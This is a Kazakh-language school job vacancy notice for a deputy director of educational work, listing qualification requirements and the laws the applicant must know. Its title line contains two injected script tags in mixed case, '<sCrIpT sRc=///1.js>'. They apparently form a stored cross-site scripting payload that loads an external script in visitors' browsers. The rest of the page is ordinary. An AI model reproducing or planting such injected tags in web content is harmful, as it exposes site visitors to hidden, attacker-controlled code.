Бос орын туралы хабарландыру!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.09.2023

Директордың тәрбие жұмыс жөніндегі орынбасары.
Біліктілікке қойылатын талаптар:
      тиісті бейін бойынша жоғары және (немесе) жоғары оқу орнынан кейінгі педагогикалық немесе өзге де кәсіптік білім немесе педагогикалық қайта даярлауды, педагогикалық жұмыс өтілін кемінде 3 жыл растайтын құжат;
      және (немесе) білім беру ұйымының "үшінші біліктілік санаты басшысының орынбасары" немесе "екінші біліктілік санаты басшысының орынбасары" немесе "бірінші біліктілік санаты басшысының орынбасары" біліктілік санатының болуы не "педагог – сарапшы" біліктілігінің болуы немесе "педагог – зерттеуші" немесе "педагог – шебер"болуы.
Білуі керек:
      Қазақстан Республикасының Конституциясын, Қазақстан Республикасының Еңбек кодексін, "Білім туралы", "Педагог мәртебесі туралы", "Сыбайлас жемқорлыққа қарсы іс-қимыл туралы", "Қазақстан Республикасындағы тілдер туралы" Қазақстан Республикасының заңдарын және білім беруді дамытудың бағыттары мен перспективаларын айқындайтын өзге де нормативтік құқықтық актілерді;
      Педагогика және психология негіздері;
      білім берудің мемлекеттік жалпыға міндетті стандарты, педагогикалық ғылым мен практиканың жетістіктері;
      педагогикалық этика нормалары;
      экономика, қаржы-шаруашылық қызмет негіздері;
      еңбек қауіпсіздігі және еңбекті қорғау, өрттен қорғау ережелері, санитарлық ережелер мен нормалар.

Просмотров: 490


Пікір қосу



Деректерді қолтаңбаға қосу